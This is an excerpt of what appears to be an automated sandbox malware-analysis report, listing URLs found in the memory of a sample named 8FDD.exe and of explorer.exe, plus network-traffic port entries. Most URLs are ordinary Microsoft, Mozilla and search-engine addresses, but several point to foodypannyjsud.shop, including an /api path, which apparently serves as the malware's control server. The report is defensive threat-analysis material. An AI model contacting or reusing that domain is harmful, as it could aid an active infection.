          Source: 8FDD.exe, 00000006.00000003.2116436627.0000000003D09000.00000004.00000800.00020000.00000000.sdmp, 8FDD.exe, 00000006.00000003.2116122876.0000000003D1F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: explorer.exe, 00000001.00000000.1712797791.000000000C893000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
          Source: explorer.exe, 00000001.00000000.1709654880.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
          Source: explorer.exe, 0000000B.00000002.2868395597.0000000006AFA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2512992935.0000000006B7E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2505122702.0000000006B88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3kPo
          Source: explorer.exe, 0000000B.00000002.2868395597.0000000006AFA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2512992935.0000000006B7E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2505122702.0000000006B88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirm
          Source: explorer.exe, 00000001.00000000.1709654880.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmr
          Source: explorer.exe, 00000001.00000000.1712797791.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
          Source: explorer.exe, 0000000B.00000003.2512292120.0000000008E9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
          Source: explorer.exe, 00000001.00000000.1710883230.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/q
          Source: explorer.exe, 0000000B.00000002.2870375975.0000000008D6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
          Source: explorer.exe, 0000000B.00000003.2512292120.0000000008DBE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2501479783.0000000008DBE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2505788300.0000000008DBE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2870375975.0000000008DBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
          Source: explorer.exe, 00000001.00000000.1710883230.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
          Source: explorer.exe, 00000001.00000000.1709654880.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2868395597.0000000006AFA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2443147302.0000000006AFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
          Source: explorer.exe, 00000001.00000000.1710883230.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1709654880.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2868395597.0000000006AFA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2443147302.0000000006AFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
          Source: explorer.exe, 0000000B.00000003.2512292120.0000000008DBE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2501479783.0000000008DBE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2505788300.0000000008DBE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2870375975.0000000008DBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?dg
          Source: explorer.exe, 0000000B.00000003.2512992935.0000000006BB6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2868395597.0000000006BB6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2505122702.0000000006BB6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com:
          Source: explorer.exe, 00000001.00000000.1710883230.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comi
          Source: explorer.exe, 0000000B.00000003.2443147302.0000000006AFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
          Source: explorer.exe, 0000000B.00000003.2443147302.0000000006AFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
          Source: explorer.exe, 0000000B.00000003.2443147302.0000000006AFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
          Source: explorer.exe, 00000001.00000000.1709654880.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2868395597.0000000006AFA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2443147302.0000000006AFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
          Source: 8FDD.exe, 00000006.00000003.2142945532.000000000199F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
          Source: 8FDD.exe, 00000006.00000003.2142945532.000000000199F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
          Source: 8FDD.exe, 00000006.00000003.2116436627.0000000003D09000.00000004.00000800.00020000.00000000.sdmp, 8FDD.exe, 00000006.00000003.2116122876.0000000003D1F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: explorer.exe, 00000001.00000000.1709654880.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2868395597.0000000006AFA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2443147302.0000000006AFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
          Source: explorer.exe, 00000001.00000000.1709654880.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2868395597.0000000006AFA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2443147302.0000000006AFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
          Source: explorer.exe, 00000001.00000000.1709654880.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
          Source: explorer.exe, 00000001.00000000.1709654880.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
          Source: explorer.exe, 00000001.00000000.1709654880.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2868395597.0000000006AFA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2443147302.0000000006AFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
          Source: explorer.exe, 00000001.00000000.1709654880.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2868395597.0000000006AFA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2443147302.0000000006AFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
          Source: explorer.exe, 00000001.00000000.1709654880.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2868395597.0000000006AFA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2443147302.0000000006AFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
          Source: explorer.exe, 00000001.00000000.1709654880.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2868395597.0000000006AFA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2443147302.0000000006AFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
          Source: 8FDD.exe, 00000006.00000003.2116436627.0000000003D09000.00000004.00000800.00020000.00000000.sdmp, 8FDD.exe, 00000006.00000003.2116122876.0000000003D1F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
          Source: 8FDD.exe, 00000006.00000003.2116436627.0000000003D09000.00000004.00000800.00020000.00000000.sdmp, 8FDD.exe, 00000006.00000003.2116122876.0000000003D1F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: 8FDD.exe, 00000006.00000003.2142945532.000000000199F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
          Source: 8FDD.exe, 00000006.00000003.2142945532.000000000199F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
          Source: 8FDD.exe, 00000006.00000003.2116436627.0000000003D09000.00000004.00000800.00020000.00000000.sdmp, 8FDD.exe, 00000006.00000003.2116122876.0000000003D1F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: 8FDD.exe, 00000006.00000003.2116436627.0000000003D09000.00000004.00000800.00020000.00000000.sdmp, 8FDD.exe, 00000006.00000003.2116122876.0000000003D1F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: 8FDD.exe, 00000006.00000003.2116436627.0000000003D09000.00000004.00000800.00020000.00000000.sdmp, 8FDD.exe, 00000006.00000003.2116122876.0000000003D1F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: explorer.exe, 00000001.00000000.1712797791.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
          Source: 8FDD.exe, 00000006.00000003.2218999405.000000000197B000.00000004.00000020.00020000.00000000.sdmp, 8FDD.exe, 00000006.00000003.2116192738.000000000191B000.00000004.00000020.00020000.00000000.sdmp, 8FDD.exe, 00000006.00000003.2163929532.000000000197E000.00000004.00000020.00020000.00000000.sdmp, 8FDD.exe, 00000006.00000002.2220441395.00000000018FE000.00000004.00000020.00020000.00000000.sdmp, 8FDD.exe, 00000006.00000003.2163724848.0000000001978000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://foodypannyjsud.shop/
          Source: 8FDD.exe, 00000006.00000002.2220921754.000000000197B000.00000004.00000020.00020000.00000000.sdmp, 8FDD.exe, 00000006.00000003.2218999405.000000000197B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://foodypannyjsud.shop/F9
          Source: 8FDD.exe, 00000006.00000002.2220921754.000000000197B000.00000004.00000020.00020000.00000000.sdmp, 8FDD.exe, 00000006.00000003.2218999405.000000000197B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://foodypannyjsud.shop/F9R
          Source: 8FDD.exe, 00000006.00000003.2219055586.0000000001972000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://foodypannyjsud.shop/api
          Source: 8FDD.exe, 00000006.00000003.2117087477.000000000196E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://foodypannyjsud.shop/api)
          Source: 8FDD.exe, 00000006.00000003.2117087477.000000000196E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://foodypannyjsud.shop/apiS
          Source: 8FDD.exe, 00000006.00000003.2218999405.000000000197B000.00000004.00000020.00020000.00000000.sdmp, 8FDD.exe, 00000006.00000003.2219073134.0000000001985000.00000004.00000020.00020000.00000000.sdmp, 8FDD.exe, 00000006.00000002.2220943576.0000000001987000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://foodypannyjsud.shop/apiT
          Source: 8FDD.exe, 00000006.00000003.2117087477.000000000196E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://foodypannyjsud.shop/ne
          Source: 8FDD.exe, 00000006.00000003.2117087477.000000000196E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://foodypannyjsud.shop/o
          Source: 8FDD.exe, 00000006.00000002.2220921754.000000000197B000.00000004.00000020.00020000.00000000.sdmp, 8FDD.exe, 00000006.00000003.2218999405.000000000197B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://foodypannyjsud.shop/pi
          Source: explorer.exe, 00000001.00000000.1709654880.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2868395597.0000000006AFA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2443147302.0000000006AFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
          Source: explorer.exe, 00000001.00000000.1709654880.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2868395597.0000000006AFA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2443147302.0000000006AFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
          Source: explorer.exe, 00000001.00000000.1709654880.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2868395597.0000000006AFA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2443147302.0000000006AFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
          Source: explorer.exe, 00000001.00000000.1709654880.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2868395597.0000000006AFA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2443147302.0000000006AFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
          Source: explorer.exe, 00000001.00000000.1709654880.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2868395597.0000000006AFA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2443147302.0000000006AFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
          Source: explorer.exe, 00000001.00000000.1709654880.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2868395597.0000000006AFA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2443147302.0000000006AFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
          Source: explorer.exe, 00000001.00000000.1709654880.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
          Source: 8FDD.exe, 00000006.00000003.2142945532.000000000199F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
          Source: explorer.exe, 00000001.00000000.1712797791.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com_
          Source: explorer.exe, 00000001.00000000.1712797791.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
          Source: explorer.exe, 00000001.00000000.1709654880.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2868395597.0000000006AFA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2443147302.0000000006AFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
          Source: 8FDD.exe, 00000006.00000003.2115840180.0000000003D4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
          Source: 8FDD.exe, 00000006.00000003.2142664060.0000000003E15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
          Source: 8FDD.exe, 00000006.00000003.2142664060.0000000003E15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
          Source: 8FDD.exe, 00000006.00000003.2115840180.0000000003D4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
          Source: 8FDD.exe, 00000006.00000003.2115840180.0000000003D4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
          Source: explorer.exe, 00000001.00000000.1709654880.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2868395597.0000000006AFA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2443147302.0000000006AFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000001.00000000.1709654880.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2868395597.0000000006AFA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2443147302.0000000006AFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000001.00000000.1712797791.000000000C557000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/L
          Source: explorer.exe, 00000001.00000000.1712797791.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
          Source: 8FDD.exe, 00000006.00000003.2142945532.000000000199F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
          Source: 8FDD.exe, 00000006.00000003.2116436627.0000000003D09000.00000004.00000800.00020000.00000000.sdmp, 8FDD.exe, 00000006.00000003.2116122876.0000000003D1F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
          Source: 8FDD.exe, 00000006.00000003.2142945532.000000000199F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
          Source: 8FDD.exe, 00000006.00000003.2116436627.0000000003D09000.00000004.00000800.00020000.00000000.sdmp, 8FDD.exe, 00000006.00000003.2116122876.0000000003D1F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: 8FDD.exe, 00000006.00000003.2142664060.0000000003E15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
          Source: 8FDD.exe, 00000006.00000003.2142664060.0000000003E15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
          Source: 8FDD.exe, 00000006.00000003.2142664060.0000000003E15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
          Source: 8FDD.exe, 00000006.00000003.2142664060.0000000003E15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
          Source: 8FDD.exe, 00000006.00000003.2142664060.0000000003E15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
          Source: explorer.exe, 00000001.00000000.1709654880.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2868395597.0000000006AFA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2443147302.0000000006AFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
          Source: explorer.exe, 00000001.00000000.1709654880.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2868395597.0000000006AFA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2443147302.0000000006AFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
          Source: explorer.exe, 00000001.00000000.1709654880.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1709654880.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2868395597.0000000006AFA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2443147302.0000000006AFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
          Source: explorer.exe, 00000001.00000000.1709654880.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2868395597.0000000006AFA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2443147302.0000000006AFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
          Source: explorer.exe, 00000001.00000000.1709654880.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2868395597.0000000006AFA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2443147302.0000000006AFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
          Source: explorer.exe, 00000001.00000000.1709654880.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2868395597.0000000006AFA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2443147302.0000000006AFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
          Source: explorer.exe, 00000001.00000000.1709654880.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2868395597.0000000006AFA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2443147302.0000000006AFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
          Source: explorer.exe, 00000001.00000000.1709654880.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2868395597.0000000006AFA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2443147302.0000000006AFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
          Source: explorer.exe, 00000001.00000000.1709654880.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2868395597.0000000006AFA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2443147302.0000000006AFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
          Source: explorer.exe, 00000001.00000000.1709654880.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
          Source: explorer.exe, 00000001.00000000.1709654880.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2868395597.0000000006AFA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2443147302.0000000006AFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
          Source: explorer.exe, 00000001.00000000.1709654880.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2868395597.0000000006AFA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2443147302.0000000006AFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
          Source: explorer.exe, 00000001.00000000.1709654880.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2868395597.0000000006AFA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2443147302.0000000006AFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
          Source: explorer.exe, 00000001.00000000.1709654880.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2868395597.0000000006AFA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2443147302.0000000006AFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
          Source: explorer.exe, 00000001.00000000.1709654880.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2868395597.0000000006AFA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2443147302.0000000006AFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
          Source: explorer.exe, 00000001.00000000.1709654880.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2868395597.0000000006AFA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2443147302.0000000006AFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
          Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
          Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
          Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
